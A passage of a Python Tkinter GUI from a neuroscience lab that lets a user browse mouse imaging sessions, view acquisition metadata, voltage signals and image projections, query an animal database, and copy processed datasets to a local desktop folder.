weight=5)\n self.frame2.grid_rowconfigure(0, weight=4)\n self.frame2.grid_rowconfigure(1, weight=1)\n self.frame2.grid_rowconfigure(2, weight=10)\n \n\n self.frame2.frames[self.frame2.frames_names[0]].grid(row=0, column=0, sticky=\"nswe\") \n self.frame2.frames[self.frame2.frames_names[1]].grid(row=1, column=0, sticky=\"nswe\") \n self.frame2.frames[self.frame2.frames_names[2]].grid(row=2, column=0, sticky=\"nswe\") \n self.frame2.frames[self.frame2.frames_names[3]].grid(row=0, column=1, sticky=\"nswe\", rowspan=3) \n\n\n \n#%%'AcquisitionFrame FACECAM frame' \n self.frame2.frame1=self.frame2.frames[self.frame2.frames_names[0]].scrolled_frame\n\n self.frame2.frame1.buttons={}\n self.frame2.frame1.buttons_names=['Open facecamera on pyhton',\n 'Open kalman on pyhton', \n 'Open acquisition directory',\n 'Open dataset directory',\n 'transfer kalman to desktop',\n 'transfer eye video to desktop',\n 'transfer caiman to desktop',\n 'reset contrast',\n 'increase contrast 1',\n 'increase contrast 2',\n 'open raw directory',\n 'open slow mouse dir',\n 'plot signals',\n # 'Swicth tomato(if 3plane ac)', \n ]\n \n \n \n self.frame2.frame1.buttons_commands=[self.open_facecamera_button, \n self.open_kalman_button,\n self.open_directory_button, \n self.open_dataset_button,\n self.transfer_kalman_to_desktop_button,\n self.transfer_facecam_to_desktop_button,\n self.transfer_caiman_to_desktop_button,\n self.de_enhance,\n self.enhance_level_1,\n self.enhance_level_2,\n self.open_raw_acquisition_directory_button,\n self.open_slow_mouse_directory_button,\n self.plot_signals_button,\n # self.switch_red_button,\n\n ] \n \n \n for i, butt in enumerate( self.frame2.frame1.buttons_names):\n self.frame2.frame1.buttons[ butt]= ttk.Button( self.frame2.frame1 , text= self.frame2.frame1.buttons_names[i], command= self.frame2.frame1.buttons_commands[i])\n\n for i, name in enumerate(self.frame2.frame1.buttons_names):\n if (i % 2) == 0: \n self.frame2.frame1.buttons[name].grid(row=int(i/2)+1, column=0, sticky=\"nswe\") \n else: \n self.frame2.frame1.buttons[name].grid(row=int((i-1)/2)+1, column=1, sticky=\"nswe\")\n\n\n self.frame2.frame1.litbox_names=['Dataset to copy selection', \n ]\n \n self.frame2.frame1.listboxes={}\n self.frame2.frame1.listbox_variables={}\n for litbox_name in self.frame2.frame1.litbox_names:\n self.frame2.frame1.listbox_variables[litbox_name]=StringVar() \n self.frame2.frame1.listboxes[litbox_name]=Listbox(self.frame2.frame1, listvariable=self.frame2.frame1.listbox_variables[litbox_name], width=10, height=10)\n \n\n self.frame2.frame1.listboxes[self.frame2.frame1.litbox_names[0]].bind('<>', self.select_dataset_to_copy)\n\n\n for i, litbox in enumerate(self.frame2.frame1.listboxes.values()):\n litbox.grid(column=i, row=0)\n\n \n\n\n\n#%%'AcquisitionFrame VOLTAGE frame' \n self.frame2.frame2=self.frame2.frames[self.frame2.frames_names[1]].scrolled_frame\n\n # self.frame2.frame2.test_label=ttk.Label( self.frame2.frame2, text='Test voltage', width=20)\n # self.frame2.frame2.test_label.grid(row=10, column=10, sticky=\"snew\")\n\n self.frame2.frame2.fig = Figure(figsize=(7, 10), dpi=100)\n \n \n\n self.frame2.frame2.canvas = FigureCanvasTkAgg(self.frame2.frame2.fig, master= self.frame2.frame2) # A tk.DrawingArea.\n self.frame2.frame2.canvas.draw()\n self.frame2.frame2.canvas.get_tk_widget().pack(side=tk.TOP, fill=tk.BOTH, expand=1) \n self.frame2.frame2.toolbar = NavigationToolbar2Tk( self.frame2.frame2.canvas, self.frame2.frame2)\n self.frame2.frame2.toolbar.update()\n self.frame2.frame2.canvas.get_tk_widget().pack(side=tk.TOP, fill=tk.BOTH, expand=1)\n \n self.frame2.frame2.axs=[]\n for i in range(7):\n self.frame2.frame2.axs.append(self.frame2.frame2.fig.add_subplot(7, 1, i+1))\n\n\n#%%'AcquisitionFrame METADATA frame' \n\n self.frame2.frame3=self.frame2.frames[self.frame2.frames_names[2]].scrolled_frame\n # self.frame2.frame3.frames_names=['Metadata Frame',\n # # 'Ref Images Frame', \n # ] \n # self.frame2.frame3.frames={}\n # for i in range(len(self.frame2.frame3.frames_names)):\n # self.frame2.frame3.frames[self.frame2.frame3.frames_names[i]]=ScrollbarFrame(self.frame2.frame3)\n\n # self.frame2.frame3.grid_columnconfigure(0, weight=1)\n # self.frame2.frame3.grid_rowconfigure(0, weight=1)\n # self.frame2.frame3.grid_rowconfigure(1, weight=1)\n \n # self.frame2.frame3.frames[self.frame2.frame3.frames_names[1]].grid(row=1, column=0, sticky=\"nswe\") \n \n\n self.frame2.frame3.labels={}\n self.frame2.frame3.labels_names={\n 'PowerSetting',\n 'Objective',\n 'PMT1GainRed',\n 'PMT2GainGreen',\n 'FrameAveraging',\n 'ObjectivePositions',\n 'ETLPositions',\n 'PlaneNumber',\n 'TotalVolumes',\n 'IsETLStack',\n 'IsObjectiveStack',\n 'InterFramePeriod',\n 'FinalVolumePeriod',\n 'FinalFrequency',\n 'TotalFrames',\n 'FOVNumber',\n 'ExcitationWavelength',\n 'CoherentPower',\n 'CalculatedPower',\n 'Comments',\n 'IsChannel1Red',\n 'IsChannel2Green',\n 'IsGalvo',\n 'IsResonant', \n 'Resolution',\n 'DwellTime',\n 'Multisampling',\n 'BitDepth',\n 'LinePeriod',\n 'FramePeriod',\n 'FullAcquisitionTime', \n 'RedFilter',\n 'GreenFilter',\n 'DichroicBeamsplitter',\n 'IsBlockingDichroic',\n 'OverlapPercentage',\n 'AtlasOverlap',\n 'OverlapPercentageMetadata',\n 'AtlasDirection',\n 'AtlasZStructure',\n 'AtlasGridSize',\n 'CorrectedObjectivePositions',\n 'CorrectedETLPositions',\n 'ImagingTime',\n 'IsVoltagERecording',\n 'MicronsPerPixelX',\n 'MicronsPerPixelY',\n 'Xpositions',\n 'Ypositions',\n 'Zoom',\n 'VoltageRecordingChannels',\n 'VoltageRecordingFrequency'}\n \n self.frame2.frame3.labels_names=sorted( self.frame2.frame3.labels_names)\n\n for i in range(len(self.frame2.frame3.labels_names)):\n self.frame2.frame3.labels[self.frame2.frame3.labels_names[i]]=ttk.Label(self.frame2.frame3, text=self.frame2.frame3.labels_names[i], width=25)\n \n for i, label in enumerate(self.frame2.frame3.labels_names):\n if i<26: \n self.frame2.frame3.labels[label].grid(column=0, row=i) \n else: \n self.frame2.frame3.labels[label].grid(column=2, row=i-26)\n \n self.frame2.frame3.labels_values={}\n self.frame2.frame3.labels_values_variables={}\n \n for i ,label in enumerate(self.frame2.frame3.labels_names):\n self.frame2.frame3.labels_values_variables[label]=StringVar()\n self.frame2.frame3.labels_values[label]=ttk.Label(self.frame2.frame3, textvariable= self.frame2.frame3.labels_values_variables[label], width=25)\n\n \n for i, label in enumerate(self.frame2.frame3.labels_names):\n if i<26: \n self.frame2.frame3.labels_values[label].grid(column=1, row=i) \n \n else: \n self.frame2.frame3.labels_values[label].grid(column=3, row=i-26)\n \n \n \n#%%'AcquisitionFrame datasets frame' \n \n self.frame2.frame4=self.frame2.frames[self.frame2.frames_names[3]].scrolled_frame\n \n self.frame2.frame4.frames_names=['Dataset1 Frame' ,\n 'Dataset2 Frame', \n 'Dataset3 Frame',\n 'Dataset4 Frame'\n ]\n \n self.frame2.frame4.frames={}\n for i, val in enumerate(self.frame2.frame4.frames_names):\n self.frame2.frame4.frames[val]=ttk.Frame(self.frame2.frame4, borderwidth = 4, relief='groove')\n \n self.frame2.frame4.grid_columnconfigure(0, weight=1)\n self.frame2.frame4.grid_columnconfigure(1, weight=1)\n self.frame2.frame4.grid_rowconfigure(0, weight=1)\n self.frame2.frame4.grid_rowconfigure(1, weight=1)\n \n for i, val in enumerate(self.frame2.frame4.frames_names):\n if (i % 2) == 0: \n self.frame2.frame4.frames[val].grid(row=int(i/2), column=0, sticky=\"nswe\") \n else: \n self.frame2.frame4.frames[val].grid(row=int((i-1)/2), column=1, sticky=\"nswe\") \n #%%'AcquisitionFrame dataset frame images' \n for dataset_frame in self.frame2.frame4.frames.values():\n dataset_frame.frames_names=['Std proj', \n 'average proj' \n ]\n dataset_frame.frames={}\n for i, val in enumerate(dataset_frame.frames_names):\n dataset_frame.frames[val]=ttk.Frame(dataset_frame, borderwidth = 4, relief='groove')\n \n dataset_frame.grid_columnconfigure(0, weight=1)\n dataset_frame.grid_columnconfigure(1, weight=1)\n dataset_frame.grid_rowconfigure(0, weight=1)\n \n \n for i, val in enumerate(dataset_frame.frames_names):\n dataset_frame.frames[val].grid(row=0, column=i, sticky=\"nswe\") \n \n for frame in dataset_frame.frames.values():\n frame.fig = Figure(figsize=(4, 4), dpi=100)\n frame.ax= frame.fig.add_axes([0.1,0.1,0.8,0.8])\n frame.canvas = FigureCanvasTkAgg( frame.fig, master= frame) # A tk.DrawingArea.\n frame.canvas.draw()\n frame.canvas.get_tk_widget().pack(side=tk.TOP, fill=tk.BOTH, expand=1) \n frame.toolbar = NavigationToolbar2Tk( frame.canvas, frame)\n frame.toolbar.update()\n frame.canvas.get_tk_widget().pack(side=tk.TOP, fill=tk.BOTH, expand=1)\n\n#%% methods \n def get_all_objects(self):\n # this is the slowest step, load al metdatas\n\n self.mice_objects={mouse:{'Object':self.datamanaging.all_experimetal_mice_objects[mouse]} for mouse in self.mice}\n for mouse, m_dic in self.mice_objects.items():\n m_dic['Acquisitions']={acq: {'Object':acq_ob} for acq, acq_ob in m_dic['Object'].all_mouse_acquisitions.items()}\n \n if m_dic['Acquisitions'].items():\n for acq, ac_dic in m_dic['Acquisitions'].items():\n print('laoding metdata'+ acq)\n ac_dic['Object'].load_metadata_slow_working_directories()\n if not ac_dic['Object'].voltage_signal_object.no_voltage_signals:\n print('laoding signals'+ acq)\n ac_dic['Object'].voltage_signal_object.load_slow_storage_voltage_signals()\n ac_dic['Object'].voltage_signal_object.signal_extraction_object()\n\n ac_dic['Datasets']={dtset:{'Object':dtset_ob} for dtset, dtset_ob in ac_dic['Object'].all_datasets.items()}\n\n\n \n def get_mouse_imaged(self): \n \n self.mice=self.datamanaging.all_existing_sessions_not_database_objects[self.session_date].session_imaged_mice_codes\n self.frame1.frame1.listbox_variables[self.frame1.frame1.litbox_names[0]].set(self.mice)\n\n def get_all_mouse_acquisitions(self):\n \n acquisitions=list(self.mice_objects[self.mouse_code]['Acquisitions'].keys())\n self.frame1.frame1.listbox_variables[self.frame1.frame1.litbox_names[1]].set(acquisitions) \n self.frame1.frame1.listboxes[self.frame1.frame1.litbox_names[1]].config(width=0,height=0)\n \n def get_acquisition_datasets(self): \n selected_acq_datasets= list(self.mice_objects[self.mouse_code]['Acquisitions'][self.selected_acquisition]['Datasets'].keys())\n # for listbox_var in self.frame1.frame1.listbox_variables[self.frame1.frame1.litbox_names[2:]]:\n for var_name in self.frame1.frame1.litbox_names[2:]:\n listbox_var =self.frame1.frame1.listbox_variables[var_name]\n listbox_var.set(selected_acq_datasets) \n self.frame1.frame1.listboxes[var_name].config(width=0,height=0)\n\n self.frame2.frame1.listbox_variables[list(self.frame2.frame1.listbox_variables.keys())[0]].set(selected_acq_datasets) \n self.frame2.frame1.listboxes[list(self.frame2.frame1.listboxes.keys())[0]].config(width=0,height=0)\n\n def get_dataset_objects(self):\n # self.selected_dataset_object=self.selected_acquisition_object.all_datasets[self.selected_dataset]\n self.selected_dataset_objects={}\n for key, val in self.selected_datasets.items():\n self.selected_dataset_objects[key]=self.mice_objects[self.mouse_code]['Acquisitions'][self.selected_acquisition]['Datasets'][val]['Object']\n \n def load_selected_datasets(self):\n \n self.selected_acquisition_object.load_vis_stim_info()\n self.selected_acquisition_object.load_voltage_signals()\n \n for key, val in self.selected_dataset_objects.items():\n val.summary_images_object.load_projections()\n \n def unload_all_datasets(self):\n for key, val in self.selected_dataset_objects.items():\n val.unload_dataset()\n \n def get_mouse_object(self):\n \n self.selected_mouse_object= self.mice_objects[self.mouse_code]['Object']\n \n def get_acquisition_object(self):\n self.selected_acquisition_object=self.mice_objects[self.mouse_code]['Acquisitions'][self.selected_acquisition]['Object']\n \n def get_mouse_info_and_data(self, event):\n selection = self.frame1.frame1.listboxes[self.frame1.frame1.litbox_names[0]].curselection()\n if selection:\n index = selection[0]\n self.mouse_code = event.widget.get(index)\n self.get_mouse_object()\n self.get_all_mouse_acquisitions()\n self.get_all_mouse_database_info()\n self.plot_widefield()\n \n else:\n pass\n \n def get_acquisition_info(self, event):\n selection = self.frame1.frame1.listboxes[self.frame1.frame1.litbox_names[1]].curselection()\n if selection:\n index = selection[0]\n self.selected_acquisition = event.widget.get(index)\n self.get_acquisition_object()\n self.get_acquisition_datasets() \n \n \n self.get_acq_metadata()\n \n # self.get_ac_facecam()\n # self.get_ac_voltages()\n # self.plot_signals()\n\n else:\n pass \n\n def get_acq_metadata(self):\n # self.selected_acquisition_object.load_metadata_slow_working_directories()\n self.metadata_dict=self.selected_acquisition_object.metadata_object.translated_imaging_metadata\n\n\n for i, label in enumerate(self.frame2.frame3.labels_names): \n \n if self.metadata_dict[label] is not np.nan: \n self.frame2.frame3.labels_values_variables[label].set( self.metadata_dict[label])\n else:\n self.frame2.frame3.labels_values_variables[label].set('NA')\n\n def get_dataset_info(self, event):\n self.selected_datasets={}\n \n for i, var_name in enumerate(self.frame1.frame1.litbox_names[2:]):\n \n listbox=self.frame1.frame1.listboxes[var_name]\n \n selection = listbox.curselection()\n if selection:\n index = selection[0]\n self.selected_datasets[self.frame1.frame1.litbox_names[i+2]] = event.widget.get(index)\n print(self.selected_datasets)\n else:\n pass\n self.get_dataset_objects()\n self.load_selected_datasets()\n self.plot_dataset_projections()\n \n def get_all_mouse_database_info(self):\n\n query_all_animals_recovery=\"\"\"\n SELECT \n Code, \n round(round(julianday('now') - julianday(b.DOB))) AS Age,\n aa.Sex_types,\n Line_short,\n G2C_table.Genotypes_types AS G2C,\n Cage,\n d.Projects,\n Labels_types,\n e.InjDate,\n round(round(julianday('now') - julianday(Injection1Date))) AS DaysFromInjection,\n f.WindDate,\n round(round(julianday('now') - julianday(WindowDate))) AS DaysFromWindow,\n Combination,\n e.DilutionSensor1,\n e.DilutionSensor2,\n e.DilutionOpto,\n ab.WindowType,\n f.DamagedAreas,\n e.InjectionSite1bleeding,\n e.InjectionSite2bleeding, \n a.Notes,\n e.Notes AS InjectionNotes, \n f.Notes AS WindowNotes, \n k.Sensors AS Sensors1,\n l.Optos AS Optos1, \n o.Sensors AS Sensors2, \n r.Optos AS Optos3, \n G2C_table.Genotypes_types AS G2C,\n Ai14_table.Genotypes_types AS Ai14,\n Ai75_table.Genotypes_types AS Ai75,\n VRC_table.Genotypes_types AS VRC,\n SLF_table.Genotypes_types AS SLF,\n PVF_table.Genotypes_types AS PVF,\n Ai65_table.Genotypes_types AS Ai65,\n Ai80_table.Genotypes_types AS Ai80,\n VGC_table.Genotypes_types AS VGC,\n Ai162_table.Genotypes_types AS Ai162,\n Ai148_table.Genotypes_types AS Ai148 \n FROM ExperimentalAnimals_table a\n LEFT JOIN MICE_table b ON a.Mouse_ID = b.ID \n LEFT JOIN Lines_table c ON c.ID=b.Line\n LEFT JOIN Projects_table d ON d.ID=a.Project\n LEFT JOIN Injections_table e ON e.ExpID = a.ID\n LEFT JOIN Windows_table f ON f.ExpID = a.ID\n LEFT JOIN VirusCombinations_table g ON g.ID=e.VirusCombination\n LEFT JOIN Virus_table h ON h.ID=g.Virus1\n LEFT JOIN Virus_table i ON i.ID=g.Virus2\n LEFT JOIN Virus_table j ON j.ID=g.Virus3\n LEFT JOIN Sensors_table k ON k.ID=h.Sensor\n LEFT JOIN Optos_table l ON l.ID=h.Opto\n LEFT JOIN Promoter_table m ON m.ID=h.Promoter\n LEFT JOIN Recombinase_table n ON n.ID=h.Recombinase\n LEFT JOIN Sensors_table o ON o.ID=i.Sensor\n LEFT JOIN Promoter_table p ON p.ID=i.Promoter\n LEFT JOIN Recombinase_table q ON q.ID=i.Recombinase\n LEFT JOIN Optos_table r ON r.ID=j.Opto\n LEFT JOIN Promoter_table s ON s.ID=j.Promoter\n LEFT JOIN Recombinase_table t ON t.ID=j.Recombinase\n LEFT JOIN Genotypes_table AS G2C_table ON b.G2C = G2C_table.ID\n LEFT JOIN Genotypes_table AS Ai14_table ON b.Ai14 = Ai14_table.ID\n LEFT JOIN Genotypes_table AS Ai75_table ON b.Ai75 = Ai75_table.ID\n LEFT JOIN Genotypes_table AS VRC_table ON b.VRC = VRC_table.ID\n LEFT JOIN Genotypes_table AS SLF_table ON b.SLF = SLF_table.ID\n LEFT JOIN Genotypes_table AS PVF_table ON b.PVF = PVF_table.ID\n LEFT JOIN Genotypes_table AS Ai65_table ON b.Ai65 = Ai65_table.ID\n LEFT JOIN Genotypes_table AS Ai80_table ON b.Ai80 = Ai80_table.ID\n LEFT JOIN Genotypes_table AS VGC_table ON b.VGC = VGC_table.ID\n LEFT JOIN Genotypes_table AS Ai162_table ON b.Ai162 = Ai162_table.ID\n LEFT JOIN Genotypes_table AS Ai148_table ON b.Ai148 = Ai148_table.ID\n LEFT JOIN Labels_table z on z.ID=a.EarMark \n LEFT JOIN Sex_table aa on aa.ID=b.Sex\n LEFT JOIN Covertype_table ab on ab.ID=f.CoverType\n\n WHERE Code IN(?)\"\"\" \n \n params=tuple([self.mouse_code,])\n self.micebrought_info=self.datamanaging.Database_ref.arbitrary_query_to_df(query_all_animals_recovery, params)\n \n for i, label in enumerate(self.frame1.frame2.labels_names): \n if self.micebrought_info.iloc[0, i]:\n self.frame1.frame2.labels_values_variables[label].set(self.micebrought_info.iloc[0, i]) \n else:\n self.frame1.frame2.labels_values_variables[label].set('NA') \n \n def open_directory_button(self):\n self.open_acquisition_directory_action()\n \n def open_raw_acquisition_directory_button(self):\n self.open_raw_acquisition_directory_action()\n \n def open_slow_mouse_directory_button(self):\n self.open_slow_mouse_directory_action()\n \n def open_dataset_button(self):\n self.open_dataset_directory_action()\n \n def transfer_kalman_to_desktop(self): \n try:\n if os.path.isfile(self.selected_dataset_to_copy_object.kalman_object.kalman_path):\n print('trasnefering to desktop kalman')\n shutil.copyfile(self.selected_dataset_to_copy_object.kalman_object.kalman_path, os.path.join(r'C:\\Users\\sp3660\\Desktop\\DatabaseAddingTemporal',os.path.split(self.selected_dataset_to_copy_object.kalman_object.kalman_path)[1]))\n print('kalman transfered')\n\n else:\n print('no klamna')\n\n except:\n print('kalman not transfered')\n \n def transfer_kalman_to_desktop_button(self):\n self.transfer_kalman_to_desktop()\n\n def transfer_caiman_to_desktop(self):\n try:\n if os.path.isfile(self.selected_dataset_to_copy_object.most_updated_caiman.caiman_path):\n\n print('trasnefering to desktop caiman')\n shutil.copyfile(self.selected_dataset_to_copy_object.most_updated_caiman.caiman_path, os.path.join(r'C:\\Users\\sp3660\\Desktop\\DatabaseAddingTemporal',os.path.split(self.selected_dataset_to_copy_object.most_updated_caiman.caiman_path)[1]))\n print('caiman transfered')\n else:\n print('no caiman')\n\n except:\n print('caiman not transfered')\n \n def transfer_caiman_to_desktop_button(self):\n self.transfer_caiman_to_desktop()\n\n def transfer_facecam_to_desktop(self):\n \n try:\n if os.path.isfile(self.selected_acquisition_object.face_camera.working_camera_full_path):\n print('trasnefering to desktop facecam')\n shutil.copyfile(self.selected_acquisition_object.face_camera.working_camera_full_path, os.path.join(r'C:\\Users\\sp3660\\Desktop\\DatabaseAddingTemporal',os.path.split(self.selected_acquisition_object.face_camera.working_camera_full_path)[1]))\n print('facecam transfered')\n else:\n print('no facecam')\n\n except:\n print('facecam not transfered')\n\n def transfer_facecam_to_desktop_button(self):\n self.transfer_facecam_to_desktop()\n\n def select_dataset_to_copy(self, event):\n\n selection = self.frame2.frame1.listboxes[self.frame2.frame1.litbox_names[0]].curselection()\n if selection:\n index = selection[0]\n self.selected_dataset_to_copy = event.widget.get(index)\n self.selected_dataset_to_copy_object=self.selected_acquisition_object.all_datasets[self.selected_dataset_to_copy]\n \n else:\n pass \n \n def open_acquisition_directory_action(self):\n \n os.startfile(self.selected_acquisition_object.mouse_aquisition_path)\n \n def open_slow_mouse_directory_action(self):\n \n os.startfile( os.path.join(self.selected_mouse_object.mouse_slow_subproject_path,'imaging',self.session_date))\n \n def open_raw_acquisition_directory_action(self):\n \n os.startfile(self.datamanaging.all_existing_sessions_not_database_objects[ self.session_date].imaging_session_mice_path+'\\\\'+self.mouse_code)\n\n def open_dataset_directory_action(self):\n \n os.startfile(self.selected_dataset_to_copy_object.selected_dataset_mmap_path)\n\n def open_facecamera_button(self):\n pass\n \n def open_kalman_button(self):\n pass\n\n def switch_red_button(self):\n pass\n \n def plot_widefield(self, *a):\n \n widefieldob=self.datamanaging.all_experimetal_mice_objects[ self.mouse_code].\\\n imaging_sessions_not_yet_database_objects[self.session_date].\\\n widefield_image[list(self.datamanaging.all_experimetal_mice_objects[ self.mouse_code].\\\n imaging_sessions_not_yet_database_objects[self.session_date].\\\n widefield_image.keys())[0]]\n \n widefieldob.load_all()\n self.frame1.frame3.ax.clear()\n widefieldob.plot_image(self.frame1.frame3.ax)\n widefieldob.plot_rois(self.frame1.frame3.ax)\n \n self.frame1.frame3.canvas.draw() \n \n def plot_signals_button(self):\n t=time.time()\n print('Plotting signals')\n self.plot_signals()\n elapsed=time.time()-t\n\n print('Signlas pltted '+ str(elapsed) )\n pass\n \n def plot_signals(self):\n \n for i in self.frame2.frame2.axs:\n i.clear()\n \n self.frame2.frame2.canvas.draw() \n dats=[]\n if not self.selected_acquisition_object.voltage_signal_object.no_voltage_signals:\n if hasattr(self.selected_acquisition_object.voltage_signal_object.extraction_object, 'rectified_speed_array'): \n dats.append(self.selected_acquisition_object.voltage_signal_object.extraction_object.rectified_speed_array)\n else:\n dats.append(np.array([False]) )\n \n for signal in self.selected_acquisition_object.voltage_signal_object.voltage_signals_dictionary.keys():\n dats.append(self.selected_acquisition_object.voltage_signal_object.voltage_signals_dictionary[signal])\n\n # for n, ax in enumerate(self.frame2.frame2.axs):\n for n, dat in enumerate(dats):\n self.frame2.frame2.axs[n].clear()\n self.frame2.frame2.canvas.draw() \n self.frame2.frame2.axs[n].plot(dat)\n else:\n dats.append(np.array([False]))\n self.frame2.frame2.axs[0].clear()\n self.frame2.frame2.axs[0].plot(dats[0])\n \n self.frame2.frame2.canvas.draw() \n \n def plot_dataset_projections(self, *a):\n \n for i, dataset in enumerate(self.selected_dataset_objects.values()):\n \n for j, image_frame in enumerate(self.frame2.frame4.frames[self.frame2.frame4.frames_names[i]].frames.values()):\n \n dataset_final=np.array([False])\n image_frame.ax.clear()\n image_frame.canvas.draw() \n\n if j==0:\n dataset_final=dataset.summary_images_object.projection_dic['std_projection_path']\n else:\n dataset_final=dataset.summary_images_object.projection_dic['average_projection_path']\n\n if dataset_final.any():\n image_frame.ax.clear() \n image_frame.ax.imshow(dataset_final, cmap='inferno', aspect='equal')\n image_frame.canvas.draw() \n \n def enhance_level_1(self,*a): \n self.get_dataset_objects()\n for i, dataset in enumerate(self.selected_dataset_objects.values()):\n \n for j, image_frame in enumerate(self.frame2.frame4.frames[self.frame2.frame4.frames_names[i]].frames.values()):\n dataset_final=np.array([False])\n image_frame.ax.clear()\n image_frame.canvas.draw() \n\n if j==0:\n dataset_final=dataset.summary_images_object.projection_dic['std_projection_path']\n else:\n dataset_final=dataset.summary_images_object.projection_dic['average_projection_path']\n\n if dataset_final.any():\n image_frame.ax.clear()\n dataset_final.min() \n average=dataset_final.mean()\n std_im=dataset_final.std()\n vmin=average-8*std_im\n vmax=average+8*std_im\n if vmin< dataset_final.min() : vmin = dataset_final.min()\n if vmax> dataset_final.max() : vmax = dataset_final.max()\n image_frame.ax.imshow(dataset_final, cmap='inferno', aspect='equal', vmin=vmin, vmax=vmax) \n image_frame.canvas.draw()\n \n def enhance_level_2(self,*a): \n self.get_dataset_objects()\n for i, dataset in enumerate(self.selected_dataset_objects.values()):\n \n for j, image_frame in enumerate(self.frame2.frame4.frames[self.frame2.frame4.frames_names[i]].frames.values()):\n dataset_final=np.array([False])\n image_frame.ax.clear()\n image_frame.canvas.draw() \n \n if j==0:\n dataset_final=dataset.summary_images_object.projection_dic['std_projection_path']\n else:\n dataset_final=dataset.summary_images_object.projection_dic['average_projection_path']\n \n if dataset_final.any():\n image_frame.ax.clear()\n dataset_final.min() \n average=dataset_final.mean()\n std_im=dataset_final.std()\n vmin=average-6*std_im\n vmax=average+6*std_im\n if vmin< dataset_final.min() : vmin = dataset_final.min()\n if vmax> dataset_final.max() : vmax = dataset_final.max()\n image_frame.ax.imshow(dataset_final, cmap='inferno', aspect='equal', vmin=vmin, vmax=vmax) \n image_frame.canvas.draw()\n \n def de_enhance(self,*a): \n self.get_dataset_objects()\n for i, dataset in enumerate(self.selected_dataset_objects.values()):\n \n for j, image_frame in enumerate(self.frame2.frame4.frames[self.frame2.frame4.frames_names[i]].frames.values()):\n\n dataset_final=np.array([False])\n image_frame.ax.clear()\n image_frame.canvas.draw() \n\n if j==0:\n dataset_final=dataset.summary_images_object.projection_dic['std_projection_path']\n else:\n dataset_final=dataset.summary_images_object.projection_dic['average_projection_path']\n\n if dataset_final.any():\n image_frame.ax.clear()\n image_frame.ax.imshow(dataset_final, cmap='inferno', aspect='equal')\n image_frame.canvas.draw() \n \n#%% main startup\nif __name__ == \"__main__\":\n from pathlib import Path\n import tkinter as tk\n from sys import platform\n import socket\n from project_manager.ProjectManager import ProjectManager\n import urllib3\n import os\n import pandas as pd\n\n\n house_PC='DESKTOP-V1MT0U5'\n lab_PC='DESKTOP-OKLQSQS'\n small_laptop_ubuntu='samuel-XPS-13-9380'\n small_laptop_kali='samuel-XPS-13-9380'\n big_laptop_ubuntu='samuel-XPS-15-9560'\n big_laptop_arch='samuel-XPS-15-9560'\n\n if platform == \"win32\":\n if socket.gethostname()==house_PC:\n githubtoken_path=r'C:\\Users\\Samuel\\Documents\\Github\\GitHubToken.txt'\n computer=house_PC\n elif socket.gethostname()==lab_PC:\n githubtoken_path=r'C:\\Users\\sp3660\\Documents\\Github\\GitHubToken.txt'\n computer=lab_PC\n \n elif platform == \"linux\" or platform == \"linux2\":\n if socket.gethostname()==small_laptop_ubuntu:\n computer=small_laptop_ubuntu\n githubtoken_path='/home/samuel/Documents/Github/GitHubToken.txt'\n # Path('/home/samuel/Documents/Github/GitHubToken.txt')\n print('TO DO')\n\n ProjectManager=ProjectManager(githubtoken_path, computer, platform)\n gui=0\n lab=ProjectManager.initialize_a_project('LabNY', gui) \n datamanaging=lab.datamanaging\n session_name='20220213'\n # for msession not in database\n datamanaging.all_existing_sessions_not_database_objects[session_name].read_all_yet_to_database_mice()\n mousename='SPJZ'\n testing=0\n gui2=1\n plot=0\n \n \n#%% testing\n \n if testing:\n \n pass\n \n #% dataset exp;lorarions visualizations\n # mouse_code='SPJM'\n # datamanaging.all_existing_sessions_not_database_objects\n \n \n # aldatasetss=datamanaging.all_experimetal_mice_objects[mouse_code].\\\n # all_mouse_acquisitions['20211111_FOV_1_211111_SPJM_FOV1_2planeAllenA_25x_920_50024_narrow_with-000'].\\\n # all_datasets\n \n # green_datasets= [v for key, v in aldatasetss.items() if 'Green' in key ] \n # acq=datamanaging.all_experimetal_mice_objects[mouse_code].\\\n # all_mouse_acquisitions['20211111_FOV_1_211111_SPJM_FOV1_2planeAllenA_25x_920_50024_narrow_with-000']\n \n # dat1=aldatasetss['211111_SPJM_FOV1_2planeAllenA_25x_920_50024_narrow_with-000_Plane1_Green']\n \n # test=dat1.summary_images_object.projection_dic['std_projection_path']\n # mouse_codes=datamanaging.all_existing_sessions_not_database_objects[session_name].session_imaged_mice_codes\n \n # mouse_code='SPKG'\n # mouse_object=datamanaging.all_experimetal_mice_objects[mouse_code]\n # imaging_session=mouse_object.imaging_sessions_not_yet_database_objects[session_name]\n # os.startfile(imaging_session.mouse_session_path)\n \n # acqs=[datamanaging.all_experimetal_mice_objects[mouse_code].all_mouse_acquisitions for mouse_code in mouse_codes]\n # imaging_session=[datamanaging.all_experimetal_mice_objects[mouse_code] for mouse_code in mouse_codes]\n \n # fullalen=acqs[1][list(acqs[1].keys())[-2]]\n \n # fullalen.face_camera.full_eye_camera.play()\n # test=pd.DataFrame(fullalen.voltage_signals_dictionary['Locomotion'])\n # test.plot()\n \n # fullalen.metadata_object\n \n # fullalen.all_datasets\n # surface=list(fullalen.FOV_object.all_datasets[-1].values())[0]\n # surface_green=list(surface.all_datasets.values())[0]\n # surface_red=list(surface.all_datasets.values())[0]\n # surface_green.summary_images_object.plotting()\n # surface_red.summary_images_object.plotting()\n \n # fullalgrenplane1=fullalen.all_datasets[list(fullalen.all_datasets.keys())[0]]\n # fullalgrenplane1.kalman_object.dataset_kalman_caiman_movie.play(fr=1000)\n # fullalgrenplane1.summary_images_object.plotting()\n # # %matplotlib qt\n # fullalgrenplane1.most_updated_caiman.cnm_object.estimates.view_components()\n # fullalgrenplane1.selected_dataset_mmap_path\n # os.startfile(fullalgrenplane1.selected_dataset_mmap_path)\n \n # coord0=list(fullalen.FOV_object.mouse_imaging_session_object.all_0coordinate_Aquisitions.values())[0]\n # widef=fullalen.FOV_object.mouse_imaging_session_object.widefield_image[list(fullalen.FOV_object.mouse_imaging_session_object.widefield_image.keys())[0]]\n # widef.plot_image()\n \n \n # fullalen.face_camera.full_eye_camera.play()\n # fullalgrenplane1.most_updated_caiman.cnm_object.estimates.view_components()\n # fullalgrenplane1.kalman_object.dataset_kalman_caiman_movie.play(fr=1000)\n#%% plotting\n if plot:\n \n # outfigures=1\n # if outfigures:\n # %matplotlib qt\n # else:\n # %matplotlib qt\n \n signals.plot_speed()\n signals.plot_vis_stim_trace()\n signals.plot_stim_and_speed()\n \n \n\n plot_time =np.arange(0,wsmoothemcmc.shape[1])/caimanresults.data['ops']['init_params_caiman']['data']['fr']\n signals.time_scale\n \n fig, 